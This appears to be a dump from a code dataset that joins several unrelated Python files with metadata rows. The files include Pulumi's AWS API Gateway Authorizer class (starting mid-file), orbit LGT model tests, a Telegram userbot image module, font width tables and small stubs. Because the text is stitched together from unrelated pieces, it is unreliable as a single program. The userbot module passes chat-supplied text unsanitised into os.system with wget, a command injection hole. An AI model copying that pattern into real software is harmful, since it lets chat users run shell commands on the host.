if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AuthorizerArgs.__new__(AuthorizerArgs)
__props__.__dict__["authorizer_credentials"] = authorizer_credentials
__props__.__dict__["authorizer_result_ttl_in_seconds"] = authorizer_result_ttl_in_seconds
__props__.__dict__["authorizer_uri"] = authorizer_uri
__props__.__dict__["identity_source"] = identity_source
__props__.__dict__["identity_validation_expression"] = identity_validation_expression
__props__.__dict__["name"] = name
__props__.__dict__["provider_arns"] = provider_arns
if rest_api is None and not opts.urn:
raise TypeError("Missing required property 'rest_api'")
__props__.__dict__["rest_api"] = rest_api
__props__.__dict__["type"] = type
super(Authorizer, __self__).__init__(
'aws:apigateway/authorizer:Authorizer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
authorizer_credentials: Optional[pulumi.Input[str]] = None,
authorizer_result_ttl_in_seconds: Optional[pulumi.Input[int]] = None,
authorizer_uri: Optional[pulumi.Input[str]] = None,
identity_source: Optional[pulumi.Input[str]] = None,
identity_validation_expression: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
provider_arns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
rest_api: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None) -> 'Authorizer':
"""
Get an existing Authorizer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] authorizer_credentials: The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
:param pulumi.Input[int] authorizer_result_ttl_in_seconds: The TTL of cached authorizer results in seconds. Defaults to `300`.
:param pulumi.Input[str] authorizer_uri: The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
:param pulumi.Input[str] identity_source: The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
:param pulumi.Input[str] identity_validation_expression: A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
:param pulumi.Input[str] name: The name of the authorizer
:param pulumi.Input[Sequence[pulumi.Input[str]]] provider_arns: A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
:param pulumi.Input[str] rest_api: The ID of the associated REST API
:param pulumi.Input[str] type: The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AuthorizerState.__new__(_AuthorizerState)
__props__.__dict__["authorizer_credentials"] = authorizer_credentials
__props__.__dict__["authorizer_result_ttl_in_seconds"] = authorizer_result_ttl_in_seconds
__props__.__dict__["authorizer_uri"] = authorizer_uri
__props__.__dict__["identity_source"] = identity_source
__props__.__dict__["identity_validation_expression"] = identity_validation_expression
__props__.__dict__["name"] = name
__props__.__dict__["provider_arns"] = provider_arns
__props__.__dict__["rest_api"] = rest_api
__props__.__dict__["type"] = type
return Authorizer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="authorizerCredentials")
def authorizer_credentials(self) -> pulumi.Output[Optional[str]]:
"""
The credentials required for the authorizer. To specify an IAM Role for API Gateway to assume, use the IAM Role ARN.
"""
return pulumi.get(self, "authorizer_credentials")
@property
@pulumi.getter(name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> pulumi.Output[Optional[int]]:
"""
The TTL of cached authorizer results in seconds. Defaults to `300`.
"""
return pulumi.get(self, "authorizer_result_ttl_in_seconds")
@property
@pulumi.getter(name="authorizerUri")
def authorizer_uri(self) -> pulumi.Output[Optional[str]]:
"""
The authorizer's Uniform Resource Identifier (URI). This must be a well-formed Lambda function URI in the form of `arn:aws:apigateway:{region}:lambda:path/{service_api}`,
e.g., `arn:aws:apigateway:us-west-2:lambda:path/2015-03-31/functions/arn:aws:lambda:us-west-2:012345678912:function:my-function/invocations`
"""
return pulumi.get(self, "authorizer_uri")
@property
@pulumi.getter(name="identitySource")
def identity_source(self) -> pulumi.Output[Optional[str]]:
"""
The source of the identity in an incoming request. Defaults to `method.request.header.Authorization`. For `REQUEST` type, this may be a comma-separated list of values, including headers, query string parameters and stage variables - e.g., `"method.request.header.SomeHeaderName,method.request.querystring.SomeQueryStringName,stageVariables.SomeStageVariableName"`
"""
return pulumi.get(self, "identity_source")
@property
@pulumi.getter(name="identityValidationExpression")
def identity_validation_expression(self) -> pulumi.Output[Optional[str]]:
"""
A validation expression for the incoming identity. For `TOKEN` type, this value should be a regular expression. The incoming token from the client is matched against this expression, and will proceed if the token matches. If the token doesn't match, the client receives a 401 Unauthorized response.
"""
return pulumi.get(self, "identity_validation_expression")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the authorizer
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="providerArns")
def provider_arns(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of the Amazon Cognito user pool ARNs. Each element is of this format: `arn:aws:cognito-idp:{region}:{account_id}:userpool/{user_pool_id}`.
"""
return pulumi.get(self, "provider_arns")
@property
@pulumi.getter(name="restApi")
def rest_api(self) -> pulumi.Output[str]:
"""
The ID of the associated REST API
"""
return pulumi.get(self, "rest_api")
@property
@pulumi.getter
def type(self) -> pulumi.Output[Optional[str]]:
"""
The type of the authorizer. Possible values are `TOKEN` for a Lambda function using a single authorization token submitted in a custom header, `REQUEST` for a Lambda function using incoming request parameters, or `COGNITO_USER_POOLS` for using an Amazon Cognito user pool. Defaults to `TOKEN`.
"""
return pulumi.get(self, "type")
| 54.197605 | 413 | 0.671859 | 4,380 | 36,204 | 5.373744 | 0.0621 | 0.062625 | 0.06305 | 0.056082 | 0.92994 | 0.921485 | 0.91439 | 0.911034 | 0.905723 | 0.893954 | 0 | 0.009092 | 0.225334 | 36,204 | 667 | 414 | 54.278861 | 0.830136 | 0.480941 | 0 | 0.821317 | 1 | 0 | 0.115005 | 0.061597 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163009 | false | 0.003135 | 0.015674 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
317f34029cd1b57f437537aeb2f0dd73c8d98d6d | 226 | py | Python | Sistema_medico1/accounts/decorats.py | teamingsoft01/teamingsoft01 | 3284abc6b4e0d1f2f25c70f5475f0d554ba9bece | [
"CC0-1.0"
] | null | null | null | Sistema_medico1/accounts/decorats.py | teamingsoft01/teamingsoft01 | 3284abc6b4e0d1f2f25c70f5475f0d554ba9bece | [
"CC0-1.0"
] | null | null | null | Sistema_medico1/accounts/decorats.py | teamingsoft01/teamingsoft01 | 3284abc6b4e0d1f2f25c70f5475f0d554ba9bece | [
"CC0-1.0"
] | null | null | null | from django.http import HttpResponse
from django.shortcuts import redirect
def user(view_func):
def wrapper_fun(request, *args, **kwargs):
return view_func(request, *args, **kwargs)
return wrapper_fun | 28.25 | 50 | 0.712389 | 29 | 226 | 5.413793 | 0.586207 | 0.127389 | 0.216561 | 0.292994 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.199115 | 226 | 8 | 51 | 28.25 | 0.867403 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.166667 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
318526f302efb59a1d81281939b4b915490c93e1 | 9,530 | py | Python | tests/orbit/models/test_lgt.py | szmark001/orbit | ad13b094d59c16e15159d658f8b8ce9383f52b13 | [
"Apache-2.0"
] | null | null | null | tests/orbit/models/test_lgt.py | szmark001/orbit | ad13b094d59c16e15159d658f8b8ce9383f52b13 | [
"Apache-2.0"
] | null | null | null | tests/orbit/models/test_lgt.py | szmark001/orbit | ad13b094d59c16e15159d658f8b8ce9383f52b13 | [
"Apache-2.0"
] | null | null | null | import pytest
from orbit.estimators.pyro_estimator import PyroEstimator, PyroEstimatorVI, PyroEstimatorMAP
from orbit.estimators.stan_estimator import StanEstimator, StanEstimatorMCMC, StanEstimatorVI, StanEstimatorMAP
from orbit.models.lgt import BaseLGT, LGTFull, LGTAggregated, LGTMAP
def test_base_lgt_init():
lgt = BaseLGT()
is_fitted = lgt.is_fitted()
model_data_input = lgt._get_model_data_input()
model_param_names = lgt._get_model_param_names()
init_values = lgt._get_init_values()
assert not is_fitted # model is not yet fitted
assert not model_data_input # should only be initialized and not set
assert model_param_names # model param names should already be set
# todo: change when init_values callable is implemented
assert not init_values
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI])
def test_lgt_full_univariate(synthetic_data, estimator_type):
train_df, test_df, coef = synthetic_data
lgt = LGTFull(
response_col='response',
date_col='week',
prediction_percentiles=[5, 95],
seasonality=52,
num_warmup=50,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction_lower', 'prediction', 'prediction_upper']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 13
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
def test_lgt_full_univariate_pyro(synthetic_data):
train_df, test_df, coef = synthetic_data
lgt = LGTFull(
response_col='response',
date_col='week',
prediction_percentiles=[5, 95],
seasonality=52,
num_steps=10,
verbose=False,
estimator_type=PyroEstimatorVI
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction_lower', 'prediction', 'prediction_upper']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 12 # no `lp__` in pyro
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI])
def test_lgt_aggregated_univariate(synthetic_data, estimator_type):
train_df, test_df, coef = synthetic_data
lgt = LGTAggregated(
response_col='response',
date_col='week',
seasonality=52,
num_warmup=50,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 13
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
def test_lgt_aggregated_univariate_pyro(synthetic_data):
train_df, test_df, coef = synthetic_data
lgt = LGTAggregated(
response_col='response',
date_col='week',
seasonality=52,
verbose=False,
num_steps=10,
estimator_type=PyroEstimatorVI
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 12 # no `lp__` in pyro
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
@pytest.mark.parametrize("estimator_type", [StanEstimatorMAP, PyroEstimatorMAP])
def test_lgt_map_univariate(synthetic_data, estimator_type):
train_df, test_df, coef = synthetic_data
lgt = LGTMAP(
response_col='response',
date_col='week',
seasonality=52,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 12 # no `lp__` parameter in optimizing()
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI])
def test_lgt_non_seasonal_fit(synthetic_data, estimator_type):
train_df, test_df, coef = synthetic_data
lgt = LGTFull(
response_col='response',
date_col='week',
estimator_type=estimator_type,
num_warmup=50,
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 11
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
def test_lgt_non_seasonal_fit_pyro(synthetic_data):
train_df, test_df, coef = synthetic_data
lgt = LGTFull(
response_col='response',
date_col='week',
estimator_type=PyroEstimatorVI,
num_steps=10
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_num_parameters = 10 # no `lp__` in pyro
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert len(lgt._posterior_samples) == expected_num_parameters
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI, PyroEstimatorVI])
@pytest.mark.parametrize(
"regressor_signs",
[
["+", "+", "+", "+", "+", "+"],
["=", "=", "=", "=", "=", "="],
["+", "=", "+", "=", "+", "+"]
],
ids=['positive_only', 'regular_only', 'mixed_signs']
)
def test_lgt_full_with_regression(synthetic_data, estimator_type, regressor_signs):
train_df, test_df, coef = synthetic_data
if issubclass(estimator_type, StanEstimator):
lgt = LGTFull(
response_col='response',
date_col='week',
regressor_col=train_df.columns.tolist()[2:],
regressor_sign=regressor_signs,
prediction_percentiles=[5, 95],
seasonality=52,
num_warmup=50,
verbose=False,
estimator_type=estimator_type
)
elif issubclass(estimator_type, PyroEstimator):
lgt = LGTFull(
response_col='response',
date_col='week',
regressor_col=train_df.columns.tolist()[2:],
regressor_sign=regressor_signs,
prediction_percentiles=[5, 95],
seasonality=52,
num_steps=10,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
regression_out = lgt.get_regression_coefs()
num_regressors = regression_out.shape[0]
expected_columns = ['week', 'prediction_lower', 'prediction', 'prediction_upper']
expected_shape = (51, len(expected_columns))
expected_regression_shape = (6, 3)
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert regression_out.shape == expected_regression_shape
assert num_regressors == len(train_df.columns.tolist()[2:])
@pytest.mark.parametrize("estimator_type", [StanEstimatorMCMC, StanEstimatorVI, PyroEstimatorVI])
@pytest.mark.parametrize(
"regressor_signs",
[
["+", "+", "+", "+", "+", "+"],
["=", "=", "=", "=", "=", "="],
["+", "=", "+", "=", "+", "+"]
],
ids=['positive_only', 'regular_only', 'mixed_signs']
)
def test_lgt_aggregated_with_regression(synthetic_data, estimator_type, regressor_signs):
train_df, test_df, coef = synthetic_data
if issubclass(estimator_type, StanEstimator):
lgt = LGTAggregated(
response_col='response',
date_col='week',
regressor_col=train_df.columns.tolist()[2:],
regressor_sign=regressor_signs,
seasonality=52,
num_warmup=50,
verbose=False,
estimator_type=estimator_type
)
elif issubclass(estimator_type, PyroEstimator):
lgt = LGTAggregated(
response_col='response',
date_col='week',
regressor_col=train_df.columns.tolist()[2:],
regressor_sign=regressor_signs,
seasonality=52,
num_steps=10,
verbose=False,
estimator_type=estimator_type
)
lgt.fit(train_df)
predict_df = lgt.predict(test_df)
regression_out = lgt.get_regression_coefs()
num_regressors = regression_out.shape[0]
expected_columns = ['week', 'prediction']
expected_shape = (51, len(expected_columns))
expected_regression_shape = (6, 3)
assert predict_df.shape == expected_shape
assert predict_df.columns.tolist() == expected_columns
assert regression_out.shape == expected_regression_shape
assert num_regressors == len(train_df.columns.tolist()[2:])
| 32.087542 | 111 | 0.677335 | 1,076 | 9,530 | 5.657993 | 0.110595 | 0.074737 | 0.04435 | 0.041557 | 0.876643 | 0.872043 | 0.867444 | 0.867444 | 0.867444 | 0.867444 | 0 | 0.012552 | 0.214166 | 9,530 | 296 | 112 | 32.195946 | 0.800374 | 0.025813 | 0 | 0.806867 | 0 | 0 | 0.062102 | 0 | 0.008584 | 0 | 0 | 0.003378 | 0.141631 | 1 | 0.042918 | false | 0 | 0.017167 | 0 | 0.060086 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31a4accc73a27a8a6f3e1f3490f7ca34b3893e09 | 189 | py | Python | src/abaqus/StepMiscellaneous/SubstructureGenerateFrequencyArray.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/StepMiscellaneous/SubstructureGenerateFrequencyArray.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/StepMiscellaneous/SubstructureGenerateFrequencyArray.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from .SubstructureGenerateFrequency import SubstructureGenerateFrequency
class SubstructureGenerateFrequencyArray(list[SubstructureGenerateFrequency]):
def findAt(self):
pass
| 27 | 78 | 0.830688 | 12 | 189 | 13.083333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121693 | 189 | 6 | 79 | 31.5 | 0.945783 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
9ed1fc7283a086f8d3b9579e596e036f349a505c | 114 | py | Python | yawl/shared/constants.py | gbieul/yawl | 2b31f97b72a6e80de53c52aafe65459fbbe28756 | [
"MIT"
] | null | null | null | yawl/shared/constants.py | gbieul/yawl | 2b31f97b72a6e80de53c52aafe65459fbbe28756 | [
"MIT"
] | null | null | null | yawl/shared/constants.py | gbieul/yawl | 2b31f97b72a6e80de53c52aafe65459fbbe28756 | [
"MIT"
] | null | null | null | import os
from typing_extensions import Final
SERVICE_ACCOUNT_EMAIL: Final = os.getenv("SERVICE_ACCOUNT_EMAIL")
| 19 | 65 | 0.833333 | 16 | 114 | 5.625 | 0.625 | 0.311111 | 0.422222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 114 | 5 | 66 | 22.8 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0.184211 | 0.184211 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9ed21a15f4a257ce2ca8a1124d24f9f4be7221fa | 2,588 | py | Python | userbot/modules/rpic.py | akborana/Devil | 30ef9c5ac910d6344e206921e343a0932ffd6460 | [
"MIT"
] | 1 | 2021-05-06T18:30:50.000Z | 2021-05-06T18:30:50.000Z | userbot/modules/rpic.py | hellboi-atul/javes-3.0 | 8777d482bd1ee877a96332a2cd84d880c151fa43 | [
"MIT"
] | null | null | null | userbot/modules/rpic.py | hellboi-atul/javes-3.0 | 8777d482bd1ee877a96332a2cd84d880c151fa43 | [
"MIT"
] | null | null | null | from PIL import Image
import sys
import os
from userbot.utils import admin_cmd
from userbot import bot
from userbot import bot as borg
if not os.path.isdir("./rpic/"):
os.makedirs("./rpic/")
@bot.on(admin_cmd(pattern=r"rpic"))
async def scan(event):
path = "rpic"
kk = await event.delete()
reply = await event.get_reply_message()
lol = await borg.download_media(reply.media, path)
linc = event.text
link=linc[6:]
pic=linc[30:]
import cv2
os.system(f'wget {link}')
imagePath = lol
maskPath = f"{pic}"
#cascPath = "haarcascade_frontalface_default.xml"
faceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + "haarcascade_frontalface_default.xml")
image = cv2.imread(imagePath)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(gray, 1.15)
background = Image.open(imagePath)
for (x, y, w, h) in faces:
mask = Image.open(maskPath)
mask = mask.resize((w, h), Image.ANTIALIAS)
offset = (x, y)
background.paste(mask, offset, mask=mask)
file_name = "rpic.png"
hehe = path + "/" + file_name
background.save(hehe, "PNG")
await borg.send_file(event.chat_id, hehe)
for files in (hehe, lol):
if files and os.path.exists(files):
os.remove(files)
@bot.on(admin_cmd(pattern=r"crpic"))
async def scan(event):
path = "rpic"
kk = await event.delete()
reply = await event.get_reply_message()
lol = await borg.download_media(reply.media, path)
linc = event.text
link=linc[7:]
pic=linc[31:]
import cv2
os.system(f'wget {link}')
imagePath = lol
maskPath = f"{pic}"
#cascPath = "haarcascade_frontalcatface.xml"
faceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + "haarcascade_frontalcatface.xml")
image = cv2.imread(imagePath)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(gray, 1.15)
background = Image.open(imagePath)
for (x, y, w, h) in faces:
mask = Image.open(maskPath)
mask = mask.resize((w, h), Image.ANTIALIAS)
offset = (x, y)
background.paste(mask, offset, mask=mask)
file_name = "rpic.png"
hehe = path + "/" + file_name
background.save(hehe, "PNG")
await borg.send_file(event.chat_id, hehe)
for files in (hehe, lol):
if files and os.path.exists(files):
os.remove(files)
| 22.310345 | 102 | 0.613988 | 331 | 2,588 | 4.725076 | 0.283988 | 0.025575 | 0.021739 | 0.025575 | 0.847826 | 0.847826 | 0.820972 | 0.820972 | 0.73913 | 0.73913 | 0 | 0.013641 | 0.263524 | 2,588 | 115 | 103 | 22.504348 | 0.806926 | 0.035162 | 0 | 0.764706 | 0 | 0 | 0.060995 | 0.026083 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ef88006c6b35879a6708473ae4cc0a9e9633978 | 1,494 | py | Python | venv/lib/python2.7/site-packages/pychart/afm/Utopia_BoldItalic.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | 1 | 2019-12-19T01:53:13.000Z | 2019-12-19T01:53:13.000Z | venv/lib/python2.7/site-packages/pychart/afm/Utopia_BoldItalic.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | venv/lib/python2.7/site-packages/pychart/afm/Utopia_BoldItalic.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | # AFM font Utopia-BoldItalic (path: /usr/share/fonts/afms/adobe/putbi8a.afm).
# Derived from Ghostscript distribution.
# Go to www.cs.wisc.edu/~ghost to get the Ghostcript source code.
import dir
dir.afm["Utopia-BoldItalic"] = (500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 210, 285, 455, 560, 560, 896, 752, 246, 350, 350, 500, 600, 280, 392, 280, 260, 560, 560, 560, 560, 560, 560, 560, 560, 560, 560, 280, 280, 600, 600, 600, 454, 828, 634, 680, 672, 774, 622, 585, 726, 800, 386, 388, 688, 586, 921, 741, 761, 660, 761, 681, 551, 616, 776, 630, 920, 630, 622, 618, 350, 460, 350, 600, 500, 246, 596, 586, 456, 609, 476, 348, 522, 629, 339, 333, 570, 327, 914, 635, 562, 606, 584, 440, 417, 359, 634, 518, 795, 516, 489, 466, 340, 265, 340, 600, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 285, 560, 560, 100, 560, 560, 568, 560, 246, 455, 560, 360, 360, 651, 652, 500, 500, 514, 490, 280, 500, 580, 465, 246, 455, 455, 560, 1000, 1297, 500, 454, 500, 400, 400, 400, 400, 400, 400, 402, 400, 500, 400, 400, 500, 400, 350, 400, 1000, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 500, 890, 500, 444, 500, 500, 500, 500, 592, 761, 1016, 412, 500, 500, 500, 500, 500, 789, 500, 500, 500, 339, 500, 500, 339, 562, 811, 628, )
| 249 | 1,297 | 0.624498 | 287 | 1,494 | 3.250871 | 0.400697 | 0.578778 | 0.790997 | 0.977492 | 0.33119 | 0.29582 | 0.29582 | 0.29582 | 0.29582 | 0.263666 | 0 | 0.625822 | 0.186078 | 1,494 | 5 | 1,298 | 298.8 | 0.141447 | 0.119143 | 0 | 0 | 0 | 0 | 0.012957 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
733187760aa038a9d779605f56d5bbf9a4ccf3bd | 32 | py | Python | src/test/data/pa1/AdditionalTestCase/correct_tabaswhitespaces_indent.py | Leo-Enrique-Wu/chocopy_compiler_parser | b6e94b6a1950407879e921dc379c951ea365f5a4 | [
"BSD-2-Clause"
] | null | null | null | src/test/data/pa1/AdditionalTestCase/correct_tabaswhitespaces_indent.py | Leo-Enrique-Wu/chocopy_compiler_parser | b6e94b6a1950407879e921dc379c951ea365f5a4 | [
"BSD-2-Clause"
] | null | null | null | src/test/data/pa1/AdditionalTestCase/correct_tabaswhitespaces_indent.py | Leo-Enrique-Wu/chocopy_compiler_parser | b6e94b6a1950407879e921dc379c951ea365f5a4 | [
"BSD-2-Clause"
] | null | null | null | if a > 2:
x = 2
y = 3 | 10.666667 | 13 | 0.25 | 7 | 32 | 1.142857 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.625 | 32 | 3 | 14 | 10.666667 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
735ab8c2aa24d426751e4169c19f6d8543057292 | 164 | py | Python | os_android_apk_builder/__init__.py | sqralhashimi/os_android_apk_builder-py | 20229033b16bf4f8775e8d4f6dcdde04d5e7e3f4 | [
"MIT"
] | 1 | 2021-08-14T16:01:16.000Z | 2021-08-14T16:01:16.000Z | os_android_apk_builder/__init__.py | sqralhashimi/os_android_apk_builder-py | 20229033b16bf4f8775e8d4f6dcdde04d5e7e3f4 | [
"MIT"
] | null | null | null | os_android_apk_builder/__init__.py | sqralhashimi/os_android_apk_builder-py | 20229033b16bf4f8775e8d4f6dcdde04d5e7e3f4 | [
"MIT"
] | null | null | null | import os_android_apk_builder.apk_builder
import os_android_apk_builder.modules.apk_builder_boilerplate
import os_android_apk_builder.modules.signin_config_handler
